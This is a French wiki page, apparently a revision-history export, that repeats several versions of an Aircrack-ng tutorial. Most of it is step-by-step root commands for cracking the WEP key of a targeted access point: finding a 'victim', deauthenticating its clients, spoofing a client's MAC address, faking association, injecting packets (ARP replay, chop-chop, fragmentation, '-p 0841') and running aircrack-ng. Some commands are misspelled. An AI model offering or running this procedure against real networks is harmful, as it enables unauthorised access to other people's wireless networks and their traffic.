<br />6000 = temps d'attente (en ms) entre 2 tentatives<br />
<br />-o = nombre de jeux de paquets à envoyer à la fois<br />
<br />-q = intervale entre 2 paquets "keep-alive"<br />
** En cas de filtrage MAC:<br />
>>> aireplay-ng -0 1 -a $bssid_cible -c $mac_client $iface<br />
<br />-0 = déauthentification<br />
<br />1 = nombre de deauth à envoyer à la fois (0 -> indéfiniment)<br />
<br />-c = client à déauthentifier (si pas spécifié, les deauth sont envoyés à tous les clients connectés à l'AP<br />
<br />''Vérifier dans airodump-ng si le client est bien déauthentifié, sinon recommencer, et envoyer plus de deauths à la fois si besoin''<br />
<br />
* Lancer l'injection:<br />
>>> aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b $bssid_cible -h $mac_carte $iface<br />
<br />-2 = sélection de paquets interactive (accepter le paquet avec "y")<br />
<br />-c = considérer l'adresse MAC de l'AP comme une adresse broadcast, force l'AP à renvoyer des paquets<br />
<br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump-ng, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''<br />
<br />
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:<br />
>>> aircrack-ng $fichier_capture<br />
<br />''CRACKED''</div>Mattoufoutuhttp://hack-it.org/index.php?title=Aircrack-ngAircrack-ng2008-12-20T19:44:42Z<p>Mattoufoutu : /* Mac spoofing */</p>
<hr />
<div>== Les outils de la suite aircrack ==<br />
<br />
=== aircrack-ng ===<br />
Sert à casser la clé WEP, depuis la derniere version, il utilise l'algorythme PTW par défaut.<br />
<br />
=== airbase-ng ===<br />
Sert à simuler un point d'accès afin d'attaquer le client qui se connectera au "fake-ap".<br />
<br />
=== airdecap-ng ===<br />
Sert à déchiffrer un fichier pcap (.cap) à l'aide de la clé WEP/WPA si nécessaire, afin de pouvoir consulter les paquets à l'aide d'un logiciel tel que wireshark.<br />
<br />
=== airdecloak-ng ===<br />
Sert à décloaker (démasquer) les bssid cloakés<br />
<br />
=== airdriver-ng ===<br />
Sert à compiler, dés/installer les drivers appropriés à votre carte.<br />
<br />
=== aireplay-ng ===<br />
Sert à injecter des paquets et à s'authentifier auprès des AP.<br />
<br />
=== airmon-ng ===<br />
Sert à dés/activer le mode monitor sur votre carte.<br />
<br />
=== airodump-ng ===<br />
Sert à rechercher des AP cibles et de voir les stations associées aux AP. Permet également de capturer les paquets lors de l'attaque.<br />
<br />
=== airserv-ng ===<br />
Serveur pour carte WiFi. Permet à plusieurs applications sans fil d'utiliser indépendament la carte via une connection TCP de type client-serveur.<br />
<br />
=== airolib-ng ===<br />
Permet de créer une base de données sqlite en vue d'un crack WPA.<br />
<br />'''ATTENTION: Pour fonctionner, vous devez avoir compilé aircrack avec le support pour sqlite.'''<br />
<br />
=== airtun-ng ===<br />
<br />
=== buddy-ng ===<br />
A utiliser avec easside-ng<br />
<br />
=== easside-ng ===<br />
Outil "auto-magic" permettant de communiquer avec un AP utilisant le chiffrement WEP sans en connaitre la clé.<br />
<br />
=== ivstools ===<br />
Permet d'extraire les IVs d'un fichier pcap, ou bien de rassembler plusieurs fichiers .ivs en un seul.<br />
<br />
=== makeivs ===<br />
Permet de créer un fichier .ivs à partir d'une clé WEP connue.<br />
<br />
=== packetforge-ng ===<br />
Sert à forger des paquets de différents types (le plus souvent un ARP en vue d'une injection).<br />
<br />
=== tkiptun-ng ===<br />
Permet d'aider au crack de clés WPA utilisant TKIP.<br />
<br />'''ATTENTION: Cet outil n'est pas encore fonctionnel.'''<br />
<br />
=== wesside-ng ===<br />
Outil permettant l'automatisation du crack de clé WEP.<br />
<br />
<br />
<center><big><u>'''TOUTES LES COMMANDES CI-DESSOUS SONT A EFFECTUER EN ROOT'''</u></big></center><br />
<br />
== Les drivers WiFi ==<br />
Pour charger, décharger ou compiler des drivers, utiliser airdriver-ng.<br />
* Pour connaitre les drivers supportés:<br />
>>> airdriver-ng supported<br />
<br />
* Pour connaitre les drivers déjà installés:<br />
>>> aidriver-ng installed<br />
<br />
* Pour connaitre les drivers WiFi chargés dans le kernel:<br />
>>> airdriver-ng loaded<br />
<br />
* Pour détecter les cartes WiFi:<br />
>>> airdriver-ng detect<br />
<br />
* Pour décharger un driver inutile:<br />
>>> airdriver-ng unload $num_driver<br />
<br />
* Pour compiler un driver:<br />
Récupérer les sources du kernel, s'assurer d'avoir les outils de compilation classiques installés, puis taper:<br />
<br />>>> airdriver-ng compile $num_driver<br />
<br />
* Pour installer un driver fraichement compilé:<br />
>>> airdriver-ng install $num_driver<br />
<br />
* Pour charger un driver dans le kernel:<br />
>>> airdriver-ng load $num_driver<br />
<br />
* Pour avoir des détails sur un driver:<br />
>>> airdriver-ng details $num_driver<br />
<br />
<br />
== Les différents types d'attaques ==<br />
Dans les cas où l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type "macchanger --mac $mac $iface", et relancer la carte.<br />
<br />
=== Légende ===<br />
$iface : interface correspondant à la carte WiFi (wlan0, rausb0, mon0 ou autre)<br />
<br />$canal = canal wifi à utiliser (colonne "CH" dans airodump-ng)<br />
<br />$bssid_cible = BSSID du point d'acces ciblé<br />
<br />$essid_cible = ESSID du point d'acces ciblé (peut parfois etre masqué)<br />
<br />$mac_carte = adresse MAC de la carte wifi (peut etre la meme que celle d'un client connecté en cas de MAC spoofing)<br />
<br />$mac_client = adresse MAC du client associé au point d'acces ciblé (colonne "STATION" dans airodump-ng)<br />
<br />
=== Mac spoofing ===<br />
Pour les procédures ci-dessous, dans les cas où l'association ne fonctionne pas, il faut couper la carte et changer l'adresse mac de la carte par celle d'un client connecté à la station, et relancer la carte:<br />
<br />>>> ifconfig $iface down<br />
<br />>>>macchanger --mac $mac $iface<br />
<br />
=== Méthode "ARP replay" ===<br />
'''Méthode avec client (en cas de filtrage MAC, spoofer l'adresse MAC du client comme expliqué plus haut)'''<br />
* Mettre carte en monitor:<br />
>>> ifconfig $iface down<br />
<br />>>> airmon-ng start $iface<br />
<br />
* Trouver une victime:<br />
>>> airodump-ng $iface<br />
<br />''Couper une fois la victime trouvée''<br />
<br />
* Lancer la capture d'IVs:<br />
>>> airodump-ng -c $canal -w $fichier_capture $iface<br />
<br />-w = préfixe à utiliser pour le nom du fichier de capture<br />
<br />''Laisser tourner...''<br />
<br />
* Associer la carte à l'AP:<br />
>>> aireplay-ng -1 30 -e $essid_cible -a $bssid_cible -h $mac_client $iface<br />
<br />-1 = fake association<br />
<br />30 = temps d'attente entre 2 tentatives<br />
<br />''En cas de succes, "Association successful :-)" doit s'afficher''<br />
<br />
* Lancer l'injection:<br />
>>> aireplay-ng -3 -e $essid_cible -a $bssid_cible -h $mac_client $iface<br />
<br />-3 = attaque ARP replay<br />
<br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente''<br />
<br />
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:<br />
>>> aircrack-ng $fichier_capture<br />
<br />
=== Methode "chop-chop" et "par fragmentation" ===<br />
'''Méthodes avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''<br />
* Mettre la carte en monitor:<br />
>>> ifconfig $iface down<br />
<br />>>> airmon-ng start $iface<br />
<br />
* Trouver une victime:<br />
>>> airodum-ng $iface<br />
<br />''Couper une fois la victime trouvée''<br />
<br />
* Lancer la capture d'IVs:<br />
>>> airodum-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface<br />
<br />-w = préfice à utiliser pour le nom du fichier de capture<br />
<br />''Laisser tourner...''<br />
<br />
* Associer la carte à l'AP:<br />
>>> aireplay-ng -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface<br />
<br />-1 = fake association<br />
<br />0 = temps d'attente (en ms) entre 2 tentatives<br />
<br />''En cas de succes, "Association successful :-)" doit s'afficher''<br />
** En cas d'échec:<br />
>>> aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface<br />
<br />6000 = temps d'attente (en ms) entre 2 tentatives<br />
<br />-o = nombre de jeux de paquets à envoyer à la fois<br />
<br />-q = intervale entre 2 paquets "keep-alive"<br />
<br />
* Attaque:<br />
Ces 2 attaques permettent d'obtenir un PRGA (Pseudo Random Generation Algorythme) afin de créer un paquet ARP à injecter. Si l'attaque par fragmentation ne donne rien, on tentera la méthode chop-chop.<br />
<br />Dans les 2 cas, un fichier .xor sera créé en cas de succès.<br />
** Par fragmentation:<br />
>>> aireplay-ng -5 -b $bssid_cible -h $mac_carte $iface<br />
<br />-5 = attaque par fragmentation<br />
** Chop-chop:<br />
>>> aireplay-ng -4 -b $bssid_cible -h $mac_carte $iface<br />
<br />-4 = attaque chop-chop<br />
<br />
* Création d'un paquet ARP:<br />
>>> packetforge-ng -0 -a $bssid_cible -h mac_carte -k 255.255.255.255 -l 255.255.255.255 -y $fichier_xor -w $fichier_arp<br />
<br />-0 = générer un paquet ARP<br />
<br />-k = IP de destination (la plupart des AP répondent au 255.255.255.255)<br />
<br />-l = IP source (la plupart des AP répondent au 255.255.255.255)<br />
<br />-w = nom du fichier dans lequel mettre le paquet ARP<br />
<br />
* Injection de l'ARP:<br />
>>> aireplay-ng -2 -r $fichier_arp $iface<br />
<br />-2 = selection de paquets interactive (accepter le paquet avec "y")<br />
<br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''<br />
<br />
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:<br />
>>> aircrack-ng $fichier_capture<br />
<br />
=== Méthode "-p 0841" ===<br />
'''Méthode avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''<br />
* Mettre la carte en mode monitor:<br />
>>> ifconfig $iface down<br />
>>> airmon-ng start $iface<br />
<br />
* Trouver une victime:<br />
>>> airodump-ng $iface<br />
<br />''Couper une fois la victime trouvée''<br />
<br />
* Lancer la capture d'IVs:<br />
>>> airodump-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface<br />
<br />-w = préfixe à utiliser pour le nom du fichier de capture<br />
<br />''Laisser tourner...''<br />
<br />
* Associer la carte à la station:<br />
>>> aireplay -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface<br />
<br />-1 = fake association<br />
<br />0 = temps d'attente (en ms) entre 2 tentatives<br />
<br />''En cas de succès, "Association successful :-)" doit s'afficher<br />
** En cas d'échec:<br />
>>> aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface<br />
<br />6000 = temps d'attente (en ms) entre 2 tentatives<br />
<br />-o = nombre de jeux de paquets à envoyer à la fois<br />
<br />-q = intervale entre 2 paquets "keep-alive"<br />
<br />
* Lancer l'injection:<br />
>>> aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b $bssid_cible -h $mac_carte $iface<br />
<br />-2 = sélection de paquets interactive (accepter le paquet avec "y")<br />
<br />-c = considérer l'adresse MAC de l'AP comme une adresse broadcast, force l'AP à renvoyer des paquets<br />
<br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump-ng, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''<br />
<br />
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:<br />
>>> aircrack-ng $fichier_capture</div>Mattoufoutuhttp://hack-it.org/index.php?title=Aircrack-ngAircrack-ng2008-12-20T19:42:17Z<p>Mattoufoutu : /* Les différents types d'attaques */</p>
<hr />
<div>== Les outils de la suite aircrack ==<br />
<br />
=== aircrack-ng ===<br />
Sert à casser la clé WEP, depuis la derniere version, il utilise l'algorythme PTW par défaut.<br />
<br />
=== airbase-ng ===<br />
Sert à simuler un point d'accès afin d'attaquer le client qui se connectera au "fake-ap".<br />
<br />
=== airdecap-ng ===<br />
Sert à déchiffrer un fichier pcap (.cap) à l'aide de la clé WEP/WPA si nécessaire, afin de pouvoir consulter les paquets à l'aide d'un logiciel tel que wireshark.<br />
<br />
=== airdecloak-ng ===<br />
Sert à décloaker (démasquer) les bssid cloakés<br />
<br />
=== airdriver-ng ===<br />
Sert à compiler, dés/installer les drivers appropriés à votre carte.<br />
<br />
=== aireplay-ng ===<br />
Sert à injecter des paquets et à s'authentifier auprès des AP.<br />
<br />
=== airmon-ng ===<br />
Sert à dés/activer le mode monitor sur votre carte.<br />
<br />
=== airodump-ng ===<br />
Sert à rechercher des AP cibles et de voir les stations associées aux AP. Permet également de capturer les paquets lors de l'attaque.<br />
<br />
=== airserv-ng ===<br />
Serveur pour carte WiFi. Permet à plusieurs applications sans fil d'utiliser indépendament la carte via une connection TCP de type client-serveur.<br />
<br />
=== airolib-ng ===<br />
Permet de créer une base de données sqlite en vue d'un crack WPA.<br />
<br />'''ATTENTION: Pour fonctionner, vous devez avoir compilé aircrack avec le support pour sqlite.'''<br />
<br />
=== airtun-ng ===<br />
<br />
=== buddy-ng ===<br />
A utiliser avec easside-ng<br />
<br />
=== easside-ng ===<br />
Outil "auto-magic" permettant de communiquer avec un AP utilisant le chiffrement WEP sans en connaitre la clé.<br />
<br />
=== ivstools ===<br />
Permet d'extraire les IVs d'un fichier pcap, ou bien de rassembler plusieurs fichiers .ivs en un seul.<br />
<br />
=== makeivs ===<br />
Permet de créer un fichier .ivs à partir d'une clé WEP connue.<br />
<br />
=== packetforge-ng ===<br />
Sert à forger des paquets de différents types (le plus souvent un ARP en vue d'une injection).<br />
<br />
=== tkiptun-ng ===<br />
Permet d'aider au crack de clés WPA utilisant TKIP.<br />
<br />'''ATTENTION: Cet outil n'est pas encore fonctionnel.'''<br />
<br />
=== wesside-ng ===<br />
Outil permettant l'automatisation du crack de clé WEP.<br />
<br />
<br />
<center><big><u>'''TOUTES LES COMMANDES CI-DESSOUS SONT A EFFECTUER EN ROOT'''</u></big></center><br />
<br />
== Les drivers WiFi ==<br />
Pour charger, décharger ou compiler des drivers, utiliser airdriver-ng.<br />
* Pour connaitre les drivers supportés:<br />
>>> airdriver-ng supported<br />
<br />
* Pour connaitre les drivers déjà installés:<br />
>>> aidriver-ng installed<br />
<br />
* Pour connaitre les drivers WiFi chargés dans le kernel:<br />
>>> airdriver-ng loaded<br />
<br />
* Pour détecter les cartes WiFi:<br />
>>> airdriver-ng detect<br />
<br />
* Pour décharger un driver inutile:<br />
>>> airdriver-ng unload $num_driver<br />
<br />
* Pour compiler un driver:<br />
Récupérer les sources du kernel, s'assurer d'avoir les outils de compilation classiques installés, puis taper:<br />
<br />>>> airdriver-ng compile $num_driver<br />
<br />
* Pour installer un driver fraichement compilé:<br />
>>> airdriver-ng install $num_driver<br />
<br />
* Pour charger un driver dans le kernel:<br />
>>> airdriver-ng load $num_driver<br />
<br />
* Pour avoir des détails sur un driver:<br />
>>> airdriver-ng details $num_driver<br />
<br />
<br />
== Les différents types d'attaques ==<br />
Dans les cas où l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type "macchanger --mac $mac $iface", et relancer la carte.<br />
<br />
=== Légende ===<br />
$iface : interface correspondant à la carte WiFi (wlan0, rausb0, mon0 ou autre)<br />
<br />$canal = canal wifi à utiliser (colonne "CH" dans airodump-ng)<br />
<br />$bssid_cible = BSSID du point d'acces ciblé<br />
<br />$essid_cible = ESSID du point d'acces ciblé (peut parfois etre masqué)<br />
<br />$mac_carte = adresse MAC de la carte wifi (peut etre la meme que celle d'un client connecté en cas de MAC spoofing)<br />
<br />$mac_client = adresse MAC du client associé au point d'acces ciblé (colonne "STATION" dans airodump-ng)<br />
<br />
=== Mac spoofing ===<br />
Pour les procédures ci-dessous, dans les cas où l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type:<br />
<br />>>>macchanger --mac $mac $iface<br />
<br />et relancer la carte.<br />
<br />
=== Méthode "ARP replay" ===<br />
'''Méthode avec client (en cas de filtrage MAC, spoofer l'adresse MAC du client comme expliqué plus haut)'''<br />
* Mettre carte en monitor:<br />
>>> ifconfig $iface down<br />
<br />>>> airmon-ng start $iface<br />
<br />
* Trouver une victime:<br />
>>> airodump-ng $iface<br />
<br />''Couper une fois la victime trouvée''<br />
<br />
* Lancer la capture d'IVs:<br />
>>> airodump-ng -c $canal -w $fichier_capture $iface<br />
<br />-w = préfixe à utiliser pour le nom du fichier de capture<br />
<br />''Laisser tourner...''<br />
<br />
* Associer la carte à l'AP:<br />
>>> aireplay-ng -1 30 -e $essid_cible -a $bssid_cible -h $mac_client $iface<br />
<br />-1 = fake association<br />
<br />30 = temps d'attente entre 2 tentatives<br />
<br />''En cas de succes, "Association successful :-)" doit s'afficher''<br />
<br />
* Lancer l'injection:<br />
>>> aireplay-ng -3 -e $essid_cible -a $bssid_cible -h $mac_client $iface<br />
<br />-3 = attaque ARP replay<br />
<br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente''<br />
<br />
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:<br />
>>> aircrack-ng $fichier_capture<br />
<br />
=== Methode "chop-chop" et "par fragmentation" ===<br />
'''Méthodes avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''<br />
* Mettre la carte en monitor:<br />
>>> ifconfig $iface down<br />
<br />>>> airmon-ng start $iface<br />
<br />
* Trouver une victime:<br />
>>> airodum-ng $iface<br />
<br />''Couper une fois la victime trouvée''<br />
<br />
* Lancer la capture d'IVs:<br />
>>> airodum-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface<br />
<br />-w = préfice à utiliser pour le nom du fichier de capture<br />
<br />''Laisser tourner...''<br />
<br />
* Associer la carte à l'AP:<br />
>>> aireplay-ng -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface<br />
<br />-1 = fake association<br />
<br />0 = temps d'attente (en ms) entre 2 tentatives<br />
<br />''En cas de succes, "Association successful :-)" doit s'afficher''<br />
** En cas d'échec:<br />
>>> aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface<br />
<br />6000 = temps d'attente (en ms) entre 2 tentatives<br />
<br />-o = nombre de jeux de paquets à envoyer à la fois<br />
<br />-q = intervale entre 2 paquets "keep-alive"<br />
<br />
* Attaque:<br />
Ces 2 attaques permettent d'obtenir un PRGA (Pseudo Random Generation Algorythme) afin de créer un paquet ARP à injecter. Si l'attaque par fragmentation ne donne rien, on tentera la méthode chop-chop.<br />
<br />Dans les 2 cas, un fichier .xor sera créé en cas de succès.<br />
** Par fragmentation:<br />
>>> aireplay-ng -5 -b $bssid_cible -h $mac_carte $iface<br />
<br />-5 = attaque par fragmentation<br />
** Chop-chop:<br />
>>> aireplay-ng -4 -b $bssid_cible -h $mac_carte $iface<br />
<br />-4 = attaque chop-chop<br />
<br />
* Création d'un paquet ARP:<br />
>>> packetforge-ng -0 -a $bssid_cible -h mac_carte -k 255.255.255.255 -l 255.255.255.255 -y $fichier_xor -w $fichier_arp<br />
<br />-0 = générer un paquet ARP<br />
<br />-k = IP de destination (la plupart des AP répondent au 255.255.255.255)<br />
<br />-l = IP source (la plupart des AP répondent au 255.255.255.255)<br />
<br />-w = nom du fichier dans lequel mettre le paquet ARP<br />
<br />
* Injection de l'ARP:<br />
>>> aireplay-ng -2 -r $fichier_arp $iface<br />
<br />-2 = selection de paquets interactive (accepter le paquet avec "y")<br />
<br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''<br />
<br />
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:<br />
>>> aircrack-ng $fichier_capture<br />
<br />
=== Méthode "-p 0841" ===<br />
'''Méthode avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''<br />
* Mettre la carte en mode monitor:<br />
>>> ifconfig $iface down<br />
>>> airmon-ng start $iface<br />
<br />
* Trouver une victime:<br />
>>> airodump-ng $iface<br />
<br />''Couper une fois la victime trouvée''<br />
<br />
* Lancer la capture d'IVs:<br />
>>> airodump-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface<br />
<br />-w = préfixe à utiliser pour le nom du fichier de capture<br />
<br />''Laisser tourner...''<br />
<br />
* Associer la carte à la station:<br />
>>> aireplay -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface<br />
<br />-1 = fake association<br />
<br />0 = temps d'attente (en ms) entre 2 tentatives<br />
<br />''En cas de succès, "Association successful :-)" doit s'afficher<br />
** En cas d'échec:<br />
>>> aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface<br />
<br />6000 = temps d'attente (en ms) entre 2 tentatives<br />
<br />-o = nombre de jeux de paquets à envoyer à la fois<br />
<br />-q = intervale entre 2 paquets "keep-alive"<br />
<br />
* Lancer l'injection:<br />
>>> aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b $bssid_cible -h $mac_carte $iface<br />
<br />-2 = sélection de paquets interactive (accepter le paquet avec "y")<br />
<br />-c = considérer l'adresse MAC de l'AP comme une adresse broadcast, force l'AP à renvoyer des paquets<br />
<br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump-ng, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''<br />
<br />
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:<br />
>>> aircrack-ng $fichier_capture</div>Mattoufoutuhttp://hack-it.org/index.php?title=Aircrack-ngAircrack-ng2008-12-19T02:29:29Z<p>Mattoufoutu : /* Methode "chop-chop" et par fragmentation */</p>
<hr />
<div>== Les outils de la suite aircrack ==<br />
<br />
=== aircrack-ng ===<br />
Sert à casser la clé WEP, depuis la derniere version, il utilise l'algorythme PTW par défaut.<br />
<br />
=== airbase-ng ===<br />
Sert à simuler un point d'accès afin d'attaquer le client qui se connectera au "fake-ap".<br />
<br />
=== airdecap-ng ===<br />
Sert à déchiffrer un fichier pcap (.cap) à l'aide de la clé WEP/WPA si nécessaire, afin de pouvoir consulter les paquets à l'aide d'un logiciel tel que wireshark.<br />
<br />
=== airdecloak-ng ===<br />
Sert à décloaker (démasquer) les bssid cloakés<br />
<br />
=== airdriver-ng ===<br />
Sert à compiler, dés/installer les drivers appropriés à votre carte.<br />
<br />
=== aireplay-ng ===<br />
Sert à injecter des paquets et à s'authentifier auprès des AP.<br />
<br />
=== airmon-ng ===<br />
Sert à dés/activer le mode monitor sur votre carte.<br />
<br />
=== airodump-ng ===<br />
Sert à rechercher des AP cibles et de voir les stations associées aux AP. Permet également de capturer les paquets lors de l'attaque.<br />
<br />
=== airserv-ng ===<br />
Serveur pour carte WiFi. Permet à plusieurs applications sans fil d'utiliser indépendament la carte via une connection TCP de type client-serveur.<br />
<br />
=== airolib-ng ===<br />
Permet de créer une base de données sqlite en vue d'un crack WPA.<br />
<br />'''ATTENTION: Pour fonctionner, vous devez avoir compilé aircrack avec le support pour sqlite.'''<br />
<br />
=== airtun-ng ===<br />
<br />
=== buddy-ng ===<br />
A utiliser avec easside-ng<br />
<br />
=== easside-ng ===<br />
Outil "auto-magic" permettant de communiquer avec un AP utilisant le chiffrement WEP sans en connaitre la clé.<br />
<br />
=== ivstools ===<br />
Permet d'extraire les IVs d'un fichier pcap, ou bien de rassembler plusieurs fichiers .ivs en un seul.<br />
<br />
=== makeivs ===<br />
Permet de créer un fichier .ivs à partir d'une clé WEP connue.<br />
<br />
=== packetforge-ng ===<br />
Sert à forger des paquets de différents types (le plus souvent un ARP en vue d'une injection).<br />
<br />
=== tkiptun-ng ===<br />
Permet d'aider au crack de clés WPA utilisant TKIP.<br />
<br />'''ATTENTION: Cet outil n'est pas encore fonctionnel.'''<br />
<br />
=== wesside-ng ===<br />
Outil permettant l'automatisation du crack de clé WEP.<br />
<br />
<br />
<center><big><u>'''TOUTES LES COMMANDES CI-DESSOUS SONT A EFFECTUER EN ROOT'''</u></big></center><br />
<br />
== Les drivers WiFi ==<br />
Pour charger, décharger ou compiler des drivers, utiliser airdriver-ng.<br />
* Pour connaitre les drivers supportés:<br />
>>> airdriver-ng supported<br />
<br />
* Pour connaitre les drivers déjà installés:<br />
>>> aidriver-ng installed<br />
<br />
* Pour connaitre les drivers WiFi chargés dans le kernel:<br />
>>> airdriver-ng loaded<br />
<br />
* Pour détecter les cartes WiFi:<br />
>>> airdriver-ng detect<br />
<br />
* Pour décharger un driver inutile:<br />
>>> airdriver-ng unload $num_driver<br />
<br />
* Pour compiler un driver:<br />
Récupérer les sources du kernel, s'assurer d'avoir les outils de compilation classiques installés, puis taper:<br />
<br />>>> airdriver-ng compile $num_driver<br />
<br />
* Pour installer un driver fraichement compilé:<br />
>>> airdriver-ng install $num_driver<br />
<br />
* Pour charger un driver dans le kernel:<br />
>>> airdriver-ng load $num_driver<br />
<br />
* Pour avoir des détails sur un driver:<br />
>>> airdriver-ng details $num_driver<br />
<br />
<br />
== Les différents types d'attaques ==<br />
Dans les cas ou l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type "macchanger --mac $mac $iface", et relancer la carte.<br />
<br />
=== Légende ===<br />
$iface : interface correspondant à la carte WiFi (wlan0, rausb0, mon0 ou autre)<br />
<br />$canal = canal wifi à utiliser (colonne "CH" dans airodump-ng)<br />
<br />$bssid_cible = BSSID du point d'acces ciblé<br />
<br />$essid_cible = ESSID du point d'acces ciblé (peut parfois etre masqué)<br />
<br />$mac_carte = adresse MAC de la carte wifi (peut etre la meme que celle d'un client connecté en cas de MAC spoofing)<br />
<br />$mac_client = adresse MAC du client associé au point d'acces ciblé (colonne "STATION" dans airodump-ng)<br />
<br />
=== Mac spoofing ===<br />
Pour les procédures ci-dessous, dans les cas ou l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type:<br />
<br />>>>macchanger --mac $mac $iface<br />
<br />et relancer la carte.<br />
<br />
=== Méthode "ARP replay" ===<br />
'''Méthode avec client (en cas de filtrage MAC, spoofer l'adresse MAC du client comme expliqué plus haut)'''<br />
* Mettre carte en monitor:<br />
>>> ifconfig $iface down<br />
<br />>>> airmon-ng start $iface<br />
<br />
* Trouver une victime:<br />
>>> airodump-ng $iface<br />
<br />''Couper une fois la victime trouvée''<br />
<br />
* Lancer la capture d'IVs:<br />
>>> airodump-ng -c $canal -w $fichier_capture $iface<br />
<br />-w = préfixe à utiliser pour le nom du fichier de capture<br />
<br />''Laisser tourner...''<br />
<br />
* Associer la carte à l'AP:<br />
>>> aireplay-ng -1 30 -e $essid_cible -a $bssid_cible -h $mac_client $iface<br />
<br />-1 = fake association<br />
<br />30 = temps d'attente entre 2 tentatives<br />
<br />''En cas de succes, "Association successful :-)" doit s'afficher''<br />
<br />
* Lancer l'injection:<br />
>>> aireplay-ng -3 -e $essid_cible -a $bssid_cible -h $mac_client $iface<br />
<br />-3 = attaque ARP replay<br />
<br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente''<br />
<br />
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:<br />
>>> aircrack-ng $fichier_capture<br />
<br />
=== Methode "chop-chop" et "par fragmentation" ===<br />
'''Méthodes avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''<br />
* Mettre la carte en monitor:<br />
>>> ifconfig $iface down<br />
<br />>>> airmon-ng start $iface<br />
<br />
* Trouver une victime:<br />
>>> airodum-ng $iface<br />
<br />''Couper une fois la victime trouvée''<br />
<br />
* Lancer la capture d'IVs:<br />
>>> airodum-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface<br />
<br />-w = préfice à utiliser pour le nom du fichier de capture<br />
<br />''Laisser tourner...''<br />
<br />
* Associer la carte à l'AP:<br />
>>> aireplay-ng -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface<br />
<br />-1 = fake association<br />
<br />0 = temps d'attente (en ms) entre 2 tentatives<br />
<br />''En cas de succes, "Association successful :-)" doit s'afficher''<br />
** En cas d'échec:<br />
>>> aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface<br />
<br />6000 = temps d'attente (en ms) entre 2 tentatives<br />
<br />-o = nombre de jeux de paquets à envoyer à la fois<br />
<br />-q = intervale entre 2 paquets "keep-alive"<br />
<br />
* Attaque:<br />
